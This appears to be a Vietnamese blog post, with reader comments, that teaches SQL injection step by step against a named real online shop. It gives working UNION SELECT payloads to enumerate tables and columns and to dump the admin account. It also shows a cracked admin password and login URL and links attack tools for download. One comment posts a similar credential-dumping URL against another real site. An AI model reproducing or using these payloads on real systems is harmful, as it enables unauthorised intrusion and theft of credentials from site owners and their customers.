Bước 1: Check lỗi:
Thêm dấu ‘ sau đường link có dạng id=
Nếu giao diện website có thay đổi. Chứng tỏ site bị lỗi.
Bước 2: Tìm số trường cột
http://www.shophangkhuyenmai.com/?frame=product_detail&id=1421
order by 1-- - -> site bình thường
http://www.shophangkhuyenmai.com/?frame=product_detail&id=1421
order by 15-- - -> Site vẫn bình thường
http://www.shophangkhuyenmai.com/?frame=product_detail&id=1421
order by 16-- - -> Giao diện website
thay đổi.
Số trường cột cần tìm là 15
Bước 3: Xác định vị trí trường cột
bị lỗi
http://www.shophangkhuyenmai.com/?frame=product_detail&id=-1421
UNION SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15-- -
Chú ý là phải có dấu - trước 1421
thì mới xuất hiện ra các con số đẹp.
Chúng ta chú ý sẽ thấy xuất hiện
các con số: 2,3,6,15,7. Đó chính là những vị trí bị lỗi mà chúng ta có thể khai
thác tại đó. Ví dụ Soleil sẽ khai thác tại vị trí thứ 2.
Bước 4: Xuất ra tên các tables trong database
http://www.shophangkhuyenmai.com/?frame=product_detail&id=-1421
UNION SELECT
1,unhex(hex(group_concat(table_name))),3,4,5,6,7,8,9,10,11,12,13,14,15 from
information_schema.tables where table_schema=database()-- -
Thông tin về tên các table thu được:
tbl_config,tbl_content,tbl_content_category,tbl_member,tbl_order,tbl_order_detail,tbl_product,tbl_product_category,tbl_product_new,tbl_product_special,tbl_user,tbl_visitor
Table chứa thông tin về username
và password là tbl_user. ( Thường là nhưng table có chữ user). Vì vậy soleil sẽ khai thác ở table này.
Bước 5: Xuất ra tên các colums chứa username và password
http://www.shophangkhuyenmai.com/?frame=product_detail&id=-1421
UNION SELECT 1,unhex(hex(group_concat(column_name))),3,4,5,6,7,8,9,10,11,12,13,14,15
from information_schema.columns where table_schema=database() and
table_name=0x74626c5f75736572-- -
Lưu ý:
-
0x tạm hiểu là dung để nhận dạng khi sử dụng ở dạng
mã hex
-
74626c5f75736572 là chữ tbl_user ở dạng hex.
-
Link convert các ký tự sang mã hex:
Thông tin về tên columns thu được:
id,uid,pwd
Bước 6: Xuất ra thông tin về Username và Password
http://www.shophangkhuyenmai.com/?frame=product_detail&id=-1421
UNION SELECT
1,unhex(hex(group_concat(uid,0x2f,pwd))),3,4,5,6,7,8,9,10,11,12,13,14,15 from
tbl_user-- -
0x2f
Thông tin về username và password được mã hóa md5 thu được:
admin/679115597bf9f763506dcc9a8e9e8e82
Bước 7: Crack
Password và tìm link admin:
-
Có nhiều site để crack passwd, ví dụ:
Hoặc sử dụng google để tìm kiếm
-
Sử dụng các tool để tìm link admin: Havij, Web
admin finder
Havij 1.5 free: http://www.mediafire.com/?bcrs460vcu1vy2q
Web admin finder 2.5 : http://www.mediafire.com/?ogoclxe83no1xzg
Pass dải nén: ducdung.08clc
Thông tin Soleil thu được:
Link admin: http://www.shophangkhuyenmai.com/admin/
Username và password: admin / 961980dt
8 nhận xét:
bạn ơi một số shop nó còn http://www.shophangkhuyenmai.com/admin/ vậy thì login được còn với một shop không có admin login thì phải làm sao ha bác .em dùng Havij scan mà không thấy admin login bác ạh .giúp em với
bạn ơi . nếu không tì thấy link admin thì chỉ còn 1 cách như anh dũng chỉ mình là lừa lấy link admin của thằng admin thôi bạn ;)) còn không thì bó tay rùi
Đó giang hồ gọi là social hacking. Bít cách khai thác thì cũng ko kém phần lợi hại ;)).
Tìm link admin, hiện giờ soleil thấy tool này là tốt nhất.
http://www.mediafire.com/?ogoclxe83no1xzg
Havij thì data tìm kiếm của nó ít hơn tool trên nhiều
thanks bạn thật nhìu
cam on anh nha bai viet hay qua
Giúp mình với:
http://www.middlehamparkracing.net/trainer.php?id=-13%20UNION%20SELECT%201,unhex(hex(group_concat(username,0x2f,password))),3,4,5,6%20from%20middleham_mystable--%20-
mình tìm đến chổ này rùi nhưng không biết giải mã sao!
làm sao tìm được đường link có dang id= phía sau, mình là newbie mong được chỉ dẫn.
Bước 6: Xuất ra thông tin về Username và Password
B6:
http://www.shophangkhuyenmai.com/?frame=product_detail&id=-1421 UNION SELECT 1,unhex(hex(group_concat(uid,0x2f,pwd))),3,4,5,6,7,8,9,10,11,12,13,14,15 from tbl_user-- -
0x2f
Cho mình hỏi là 0x2f mình lấy ở đâu ra?
Đăng nhận xét